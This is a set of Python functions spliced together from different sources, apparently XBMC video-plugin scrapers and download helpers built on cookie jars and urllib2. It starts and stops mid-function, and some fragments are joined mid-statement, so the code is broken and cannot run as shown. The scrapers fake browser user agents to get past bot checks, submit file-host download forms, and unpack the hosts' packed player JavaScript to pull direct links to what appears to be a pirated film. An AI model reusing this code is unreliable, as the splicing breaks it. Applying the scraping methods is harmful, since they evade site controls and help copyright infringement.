vkid != "": #http://447.gt3.vkadre.ru/assets/videos/2638f17ddd39-75081019.vk.flv tipo = "flv" if "http://" in match[0]: videourl = "%s/assets/videos/%s%s.vk.%s" % ( match[0], match[2], vkid, tipo) else: videourl = "http://%s/assets/videos/%s%s.vk.%s" % ( match[0], match[2], vkid, tipo) else: #http://cs12385.vkontakte.ru/u88260894/video/d09802a95b.360.mp4 tipo = "360.mp4" if match[0].endswith("/"): videourl = "%su%s/video/%s.%s" % (match[0], match[1], match[2], tipo) else: videourl = "%s/u%s/video/%s.%s" % (match[0], match[1], match[2], tipo) return videourl
def urlretrieve(self,url,cachetime=None,localfile=None,ext=None,postdata=None): url=self.getFullUrl(url) urlmetafile=self.url2cachemetafile(url) if cachetime is None: cachetime=self.defaultCachetime metainfo = self.getCacheMeta(urlmetafile) furl=None fcache=None isDownloadCompleted=False try: self.onDataRetrieved(0, None, url, '') oldtimeout=socket.getdefaulttimeout() socket.setdefaulttimeout(self.socketTimeout) authurl=parseAuthUrl(url) if len(authurl[1])>0: #todo use HTTPBasicAuthHandler instead.... url=authurl[0] base64string=base64.encodestring('%s:%s' % (authurl[1],authurl[2]))[:-1] authheader = "Basic %s" % base64string request = ClientCookie.Request(url) request.add_header('User-Agent',self.userAgent) if len(authurl[1])>0: request.add_header("Authorization", authheader) #if len(self.urlContext)>0: #TODO: not always # request.add_header('Referer',self.urlContext) request.add_header('Referer',url.split( '?' )[0]) request.add_header('Cookie','clientSupportsCookies=YES') # ClientCookie doesn't set this? if not (metainfo is None): try: etag=metainfo['ETag'] request.add_header('If-None-Match', etag) except: pass try: lastmodified = metainfo['Last-Modified'] request.add_header('If-Modified-Since', lastmodified) except: pass furl=self.opener.open(request,postdata) info=furl.info() if not (metainfo is None): if hasattr(furl, 'code') and furl.code == 304: self.urlContext=metainfo['CM-UrlContext'] temp=os.path.split(metainfo['CM-Localfile']) print('using cache: '+temp[1]) isDownloadCompleted=True if not (localfile is None): nameext=os.path.splitext(metainfo['CM-Localfile']) if not (localfile.lower()==nameext[0].lower()): localfile=localfile+nameext[1] shutil.copyfile(metainfo['CM-Localfile'],localfile) return localfile return metainfo['CM-Localfile'] else: self.flushCache(url) try: totalSize=int(info['Content-Length']) except: totalSize=None #------------ construct local file name --------- xfname=os.path.splitext(urltoxfilename(url)) #tuple: suggested (filename,ext) xfname=[xfname[0],xfname[1]] #otherwise you cannot write to it try: try: old_xfname = xfname filename = info['Content-Disposition'].split( '\"' )[1] xfname = os.path.splitext( filename ) except: xfname[0] = old_xfname[0] mimetype=info['Content-Type'].split(';') # also understand "Content-Type: text/html; charset=utf-8" mimetype=mimetype[0].strip() mimeext=mimetypes.guess_extension(mimetype) if (not (mimeext is None)) and (len(mimeext)>0): if mimeext=='.m1v': mimeext='.mpg' xfname[1]=mimeext #override the one based on url alone except: pass if not (ext is None): xfname[1]=ext #override with manual extension ext=xfname[1] xfname=xfname[0] if len(ext)>0: if not (ext[0]=='.'): ext='.'+ext ext=ext[0:7] #do not allow so long extensions... Just truncate if localfile is None: #then autogenerate a file name for the cache localfile=self.cacheFolder+xfname+ext i=1 while fileExists(localfile): i=min(i*10,100000) #add a random number to minimize fileexist checks localfile=self.cacheFolder+xfname[0:30]+'['+str(random.randint(0,i-1))+']'+ext else: localfile=localfile+ext #------------------------------------------------ fcache=file(localfile,'wb') iscanceled=not self.onDataRetrieved(0, totalSize, url, localfile) data='...' blockSize=8192 pval=0 while len(data)>0: if not totalSize is None: if pval>totalSize: totalSize=pval*2 data = furl.read(blockSize) pval=pval+len(data) if len(data)>0: fcache.write(data) if len(data)<blockSize: break iscanceled=not self.onDataRetrieved(pval, totalSize, url, localfile) if iscanceled: break isDownloadCompleted=not iscanceled self.urlContext=furl.url finally: self.onDownloadFinished(isDownloadCompleted) try: if not fcache is None: fcache.close() if not furl is None: furl.close() socket.setdefaulttimeout(oldtimeout) if not isDownloadCompleted: os.remove(localfile) except: pass if not isDownloadCompleted: return None #------------- write url meta file ------------ #TODO: maybe do something if info['cache-control']=private? info['Content-Length']=str(pval) info['CM-Localfile']=localfile info['CM-urlContext']=self.urlContext info['CM-CacheTime']=str(cachetime) info['CM-TimeStamp']=str(time.time()) info['CM-url']=url fuc=file(urlmetafile,'wb') fuc.write(str(info)) fuc.close() return localfile
def downloadpage( url, post=None, headers=[[ 'User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12' ]], follow_redirects=True, timeout=socket.getdefaulttimeout()): logger.info("[scrapertools.py] downloadpage") logger.info("[scrapertools.py] url=" + url) if post is not None: logger.info("[scrapertools.py] post=" + post) else: logger.info("[scrapertools.py] post=None") # --------------------------------- # Instala las cookies # --------------------------------- # Inicializa la librería de las cookies ficherocookies = os.path.join(config.get_setting("cookies.dir"), 'cookies.lwp') logger.info("[scrapertools.py] ficherocookies=" + ficherocookies) cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: logger.info("[scrapertools.py] Importando cookielib") import cookielib except ImportError: logger.info("[scrapertools.py] cookielib no disponible") # If importing cookielib fails # let's try ClientCookie try: logger.info("[scrapertools.py] Importando ClientCookie") import ClientCookie except ImportError: logger.info("[scrapertools.py] ClientCookie no disponible") # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: logger.info("[scrapertools.py] ClientCookie disponible") # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: logger.info("[scrapertools.py] cookielib disponible") # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules logger.info("[scrapertools.py] Hay cookies") if os.path.isfile(ficherocookies): logger.info("[scrapertools.py] Leyendo fichero cookies") # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: cj.load(ficherocookies) except: logger.info( "[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra" ) os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: logger.info("[scrapertools.py] opener usando urllib2 (cookielib)") # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 if not follow_redirects: opener = urllib2.build_opener( urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL), urllib2.HTTPCookieProcessor(cj), NoRedirectHandler()) else: opener = urllib2.build_opener( urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL), urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: logger.info("[scrapertools.py] opener usando ClientCookie") # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) # ------------------------------------------------- # Cookies instaladas, lanza la petición # ------------------------------------------------- # Contador inicio = time.clock() # Diccionario para las cabeceras txheaders = {} # Construye el request if post is None: logger.info("[scrapertools.py] petición GET") else: logger.info("[scrapertools.py] petición POST") # Añade las cabeceras logger.info("[scrapertools.py] ---------------------------") for header in headers: logger.info("[scrapertools.py] header %s=%s" % (str(header[0]), str(header[1]))) txheaders[header[0]] = header[1] logger.info("[scrapertools.py] ---------------------------") req = Request(url, post, txheaders) if timeout is None: handle = urlopen(req) else: #Disponible en python 2.6 en adelante --> handle = urlopen(req, timeout=timeout) #Para todas las versiones: deftimeout = socket.getdefaulttimeout() try: socket.setdefaulttimeout(timeout) handle = urlopen(req) except: import sys for line in sys.exc_info(): logger.error("%s" % line) socket.setdefaulttimeout(deftimeout) # Actualiza el almacén de cookies cj.save(ficherocookies) # Lee los datos y cierra data = handle.read() info = handle.info() logger.info("[scrapertools.py] Respuesta") logger.info("[scrapertools.py] ---------------------------") for header in info: logger.info("[scrapertools.py] " + header + "=" + info[header]) handle.close() logger.info("[scrapertools.py] ---------------------------") ''' # Lanza la petición try: response = urllib2.urlopen(req) # Si falla la repite sustituyendo caracteres especiales except: req = urllib2.Request(url.replace(" ","%20")) # Añade las cabeceras for header in headers: req.add_header(header[0],header[1]) response = urllib2.urlopen(req) ''' # Tiempo transcurrido fin = time.clock() logger.info("[scrapertools.py] Descargado en %d segundos " % (fin - inicio + 1)) return data
def do_login_and_fetch(self, cj, COOKIEFILE, LOGIN_URL, login_params, fetch_url, save_to, **args): """ Method to do an automated login and save the cookie. This is required for presentation download. """ ClientCookie = None cookielib = None # Properly import the correct cookie lib try: import http.cookiejar except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib.request.urlopen Request = urllib.request.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib.request.urlopen Request = urllib.request.Request cj = http.cookiejar.LWPCookieJar() if cj is not None: if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) if cookielib is not None: opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor(cj)) urllib.request.install_opener(opener) else: opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) headers = { 'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } request = Request(LOGIN_URL, login_params, headers) handle = urlopen(request) if cj: cj.save(COOKIEFILE) request = Request(fetch_url, None, headers) try: handle = urlopen(request) except urllib.error.HTTPError: print('Presentation not available for download!', file=sys.stderr) return data = handle.read() info = handle.info() ext = 'ppt' type = info['Content-Type'] ext = self.get_extension(type) if not save_to: save_to = fetch_url.split('/')[-2] + '.' save_to = save_to + ext fp = open(save_to, 'wb') fp.write(data) fp.close() if self.verbose: print('Presentation downloaded and saved to %s' % save_to)
except: pass import os, sys, cgi, pickle from time import strftime import urllib2 sys.stderr = sys.stdout READSIZE = 4000 COOKIEFILE = 'cookies.lwp' try: import ClientCookie openfun = ClientCookie.urlopen reqfun = ClientCookie.Request cj = ClientCookie.LWPCookieJar() if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) except: ClientCookie = None openfun = urllib2.urlopen reqfun = urllib2.Request ############################################################### # Nicked from BaseHTTPServer # This is the basic table of HTTP errors errorlist = { 400: ('Bad Request', 'The Server thinks your request was malformed.'),
def downloadpageGzip(url): # Inicializa la librería de las cookies ficherocookies = os.path.join(config.get_data_path(), 'cookies.lwp') logger.info("Cookiefile=" + ficherocookies) inicio = time.clock() cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: cj.load(ficherocookies) except: logger.info( "[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra" ) os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! #txheaders = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', # 'Referer':'http://www.megavideo.com/?s=signup'} import httplib parsedurl = urlparse.urlparse(url) logger.info("parsedurl=" + str(parsedurl)) txheaders = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Accept-Encoding': 'gzip,deflate', 'Keep-Alive': '300', 'Connection': 'keep-alive', 'Referer': parsedurl[0] + "://" + parsedurl[1] } logger.info(str(txheaders)) # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, None, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() fin = time.clock() logger.info("[scrapertools.py] Descargado 'Gzipped data' en %d segundos " % (fin - inicio + 1)) # Descomprime el archivo de datos Gzip try: fin = inicio import StringIO compressedstream = StringIO.StringIO(data) import gzip gzipper = gzip.GzipFile(fileobj=compressedstream) data1 = gzipper.read() gzipper.close() fin = time.clock() logger.info( "[scrapertools.py] 'Gzipped data' descomprimido en %d segundos " % (fin - inicio + 1)) return data1 except: return data
def Vreel(urlvideo): # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass xbmc.output("ficherocookies %s", ficherocookies) # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url=urlvideo #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', 'Referer':'http://beta.vreel.net/'} # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data=handle.read() handle.close() #print data # Lo pide una segunda vez, como si hubieras hecho click en el banner req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data=handle.read() handle.close() #print data patronvideos = '"(http\://ne.edgecastcdn.net[^"]+)"' matches = re.compile(patronvideos,re.DOTALL).findall(data) return matches[0]
def ping_url(url, n=1): request = ClientCookie.Request(url) for i in xrange(0,n): response = ClientCookie.urlopen(request)
def geturl(urlvideo): xbmc.output("[metadivx.py] url=" + urlvideo) # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = urlvideo #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)' } # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data # Lo pide una segunda vez, como si hubieras hecho click en el banner patron = 'http\:\/\/www\.metadivx\.com/([^\/]+)/(.*?)\.html' matches = re.compile(patron, re.DOTALL).findall(url) xbmc.output("[metadivx.py] fragmentos de la URL") scrapertools.printMatches(matches) codigo = "" nombre = "" if len(matches) > 0: codigo = matches[0][0] nombre = matches[0][1] txdata = "op=download1&usr_login=&id=" + codigo + "&fname=" + nombre + "&referer=&method_free=Continue" xbmc.output(txdata) req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data patron = '<div id="embedcontmvshre[^>]+>(.*?)</div>' matches = re.compile(patron, re.DOTALL).findall(data) scrapertools.printMatches(matches) xbmc.output("[metadivx.py] bloque packed") if len(matches) > 0: xbmc.output(matches[0]) ''' <center> <script type='text/javascript'>eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('1e.1d(\'<7 w="1c"1b="1a:19-18-17-16-15"h="g"f="e"14="4://a.6.3/9/13.12"><2 1="j"0="i"><2 1="v"0="u"><2 1="b"0="5"/><2 1="c"0="5"/><2 1="t"0="4://s.r.q.p:o/d/n/m.3.-l.k"/><8 w="11"v="u"10="z/6"t="4://s.r.q.p:o/d/n/m.3.-l.k"j="i"h="g"f="e"c="5"b="5"y="4://a.6.3/9/x/"></8></7>\');',36,51,'value|name|param|com|http|false|divx|object|embed|plugin|go|bannerEnabled|autoPlay||320px|height|630px|width|none|custommode|avi|El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_|Capitancinema|pfq3vaf2xypwtrv77uw334hb55ctx5tcd6dva|182|206|45|73|76|src|auto|bufferingMode|id|download|pluginspage|video|type|embedmvshre|cab|DivXBrowserPlugin|codebase|CC0F21721616|9C46|41fa|D0AB|67DABFBF|clsid|classid|embedcontmvshre|write|document'.split('|'))) </script> </center> ''' # El javascript empaquetado es #eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('1e.1d(\'<7 w="1c"1b="1a:19-18-17-16-15"h="g"f="e"14="4://a.6.3/9/13.12"><2 1="j"0="i"><2 1="v"0="u"><2 1="b"0="5"/><2 1="c"0="5"/><2 1="t"0="4://s.r.q.p:o/d/n/m.3.-l.k"/><8 w="11"v="u"10="z/6"t="4://s.r.q.p:o/d/n/m.3.-l.k"j="i"h="g"f="e"c="5"b="5"y="4://a.6.3/9/x/"></8></7>\');',36,51,'value|name|param|com|http|false|divx|object|embed|plugin|go|bannerEnabled|autoPlay||320px|height|630px|width|none|custommode|avi|El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_|Capitancinema|pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa|182|206|45|73|76|src|auto|bufferingMode|id|download|pluginspage|video|type|embedmvshre|cab|DivXBrowserPlugin|codebase|CC0F21721616|9C46|41fa|D0AB|67DABFBF|clsid|classid|embedcontmvshre|write|document'.split('|'))) ''' eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('1e.1d(\' <7 w="1c"1b="1a:19-18-17-16-15"h="g"f="e"14="4://a.6.3/9/13.12"> <2 1="j"0="i"> <2 1="v"0="u"> <2 1="b"0="5"/> <2 1="c"0="5"/> <2 1="t"0="4://s.r.q.p:o/d/n/m.3.-l.k"/> <8 w="11"v="u"10="z/6"t="4://s.r.q.p:o/d/n/m.3.-l.k"j="i"h="g"f="e"c="5"b="5"y="4://a.6.3/9/x/"> <embed id="embedmvshre"bufferingMode="auto"type="video/divx"src="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"custommode="none"width="630px"height="320px"autoPlay="false"bannerEnabled="false"pluginspage="http://go.divx.com/plugin/download/"> </8> </7>\');',36,51, 0'value 1|name 2|param 3|com 4|http 5|false 6|divx 7|object 8|embed 9|plugin a|go b|bannerEnabled c|autoPlay d| e|320px f|height g|630px h|width i|none j|custommode k|avi l|El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_ m|Capitancinema n|pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa o|182 p|206 q|45 r|73 s|76 t|src u|auto v|bufferingMode w|id x|download y|pluginspage z|video 10|type 11|embedmvshre 12|cab 13|DivXBrowserPlugin 14|codebase 15|CC0F21721616 16|9C46 17|41fa 18|D0AB 19|67DABFBF 1a|clsid 1b|classid 1c|embedcontmvshre 1d|write 1e|document '.split(' |'))) ''' # El javascript desempaquetado es #document.write('<object id="embedcontmvshre"classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616"width="630px"height="320px"codebase="http://go.divx.com/plugin/DivXBrowserPlugin.cab"><param name="custommode"value="none"><param name="bufferingMode"value="auto"><param name="bannerEnabled"value="false"/><param name="autoPlay"value="false"/><param name="src"value="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"/><embed id="embedmvshre"bufferingMode="auto"type="video/divx"src="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"custommode="none"width="630px"height="320px"autoPlay="false"bannerEnabled="false"pluginspage="http://go.divx.com/plugin/download/"></embed></object>'); ''' <object id="embedcontmvshre"classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616"width="630px"height="320px"codebase="http://go.divx.com/plugin/DivXBrowserPlugin.cab"> <param name="custommode"value="none"> <param name="bufferingMode"value="auto"> <param name="bannerEnabled"value="false"/> <param name="autoPlay"value="false"/> <param name="src"value="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"/> <embed id="embedmvshre"bufferingMode="auto"type="video/divx"src="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"custommode="none"width="630px"height="320px"autoPlay="false"bannerEnabled="false"pluginspage="http://go.divx.com/plugin/download/"> </embed> </object>'); ''' # La URL del video es #http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi # Lo descifra descifrado = unpackerjs.unpackjs(data) xbmc.output("descifrado=" + descifrado) # Extrae la URL patron = '<param name="src"value="([^"]+)"/>' matches = re.compile(patron, re.DOTALL).findall(descifrado) scrapertools.printMatches(matches) url = "" if len(matches) > 0: url = matches[0] xbmc.output("[metadivx.py] url=" + url) return url
def geturl(urlvideo): xbmc.output("[gigabyupload.py] url=" + urlvideo) # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = urlvideo #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)' } # fake a user agent, some websites (like google) don't like automated exploration try: req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() except: data = "" pass #print data # Lo pide una segunda vez, como si hubieras hecho click en el banner patron = 'http\:\/\/www\.gigabyteupload\.com/download\-([^\-]+)\-.*?' matches = re.compile(patron, re.DOTALL).findall(url) id = matches[0] patron = '<form method="post" action="([^"]+)">[^<]+<input type="hidden" name="security_key" value="([^"]+)" \/>' #patron += '<p><input type="submit" name="submit" value="([^"]+)" class="cbutton" \/>' matches = re.compile(patron, re.DOTALL).findall(data) xbmc.output("[gigabyupload.py] fragmentos de la URL : " + str(len(matches))) scrapertools.printMatches(matches) cecid = "" submit = "" url2 = theurl if len(matches) > 0: url2 = matches[0][0] #id = matches[0][5] cecid = matches[0][1] submit = "Watch Online" #aff = matches[0][3] #came_from = matches[0][4] txdata = "op=download&usr_login=&id=" + id + "&security_key=" + cecid + "&submit=" + submit + "&aff=&came_from=referer=&method_free=Free+Stream" xbmc.output(txdata) try: req = Request(url2, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data except: data = "" pass # Extrae el trozo cifrado patron = '<div id="player">[^<]+<script type="text/javascript">(eval.*?)</script>' matches = re.compile(patron, re.DOTALL).findall(data) scrapertools.printMatches(matches) data = "" if len(matches) > 0: data = matches[0] xbmc.output("[Gigabyteupload.py] bloque packed=" + data) else: return "" # Lo descifra descifrado = unpackerjs2.unpackjs(data) # Extrae la URL del vídeo xbmc.output("descifrado=" + descifrado) # Extrae la URL patron = '<param name="src" value="([^"]+)"' matches = re.compile(patron, re.DOTALL).findall(descifrado) scrapertools.printMatches(matches) url = "" if len(matches) > 0: url = matches[0] xbmc.output("[gigabyteupload.py] url=" + url) return url
def geturl(urlvideo): xbmc.output("[divxden.py] url=" + urlvideo) # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) 